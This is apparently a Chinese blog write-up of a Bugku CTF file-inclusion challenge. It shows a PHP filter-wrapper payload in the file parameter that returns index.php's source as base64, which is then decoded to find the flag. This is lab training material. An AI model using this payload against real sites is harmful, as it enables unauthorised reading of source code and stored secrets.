技术栈

bugku--文件包含

過路人!2023-12-15 17:25

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

上一篇:cfa一级考生复习经验分享系列(三)
下一篇:Kubeadm 方式部署K8s集群
相关推荐
Lethehong
1 小时前
第二届“启航杯“网络安全挑战赛开始啦!
安全·web安全·ctf·启航杯
蓝之白
13 小时前
流量分析_SnakeBackdoor-6
web安全·ctf·流量分析·逆向分析
clown_YZ
1 天前
HKCERTCTF2025--解题记录
ctf·漏洞利用·漏洞原理
给勒布朗上上对抗呀
2 天前
NginxDeny绕过-玄武杯2025-眼见不为实
ctf
蓝之白
2 天前
流量分析_SnakeBackdoor-1~6
web安全·ctf·流量分析·逆向分析
蓝之白
3 天前
Web15-网站被黑
web安全·ctf
777sea
3 天前
CTFSHOW-2026元旦跨年欢乐赛-CS2026
ctf
给勒布朗上上对抗呀
3 天前
序列化绕过-攻防世界-unseping
ctf
给勒布朗上上对抗呀
4 天前
FlaskSession伪造-攻防世界-catcat-new
flask·ctf
蓝之白
5 天前
Web14-game1
web安全·ctf
热门推荐
01GitHub 镜像站点02安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)03Linux下V2Ray安装配置指南04Labelme从安装到标注:零基础完整指南05手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!06【踩坑笔记】50系显卡适配的 PyTorch 安装07jdk21下载、安装(Windows、Linux、macOS)08GitLab 零基础入门指南:从安装到项目管理全流程09Opencode CLI 安装成功,但是启动失败10UV安装并设置国内源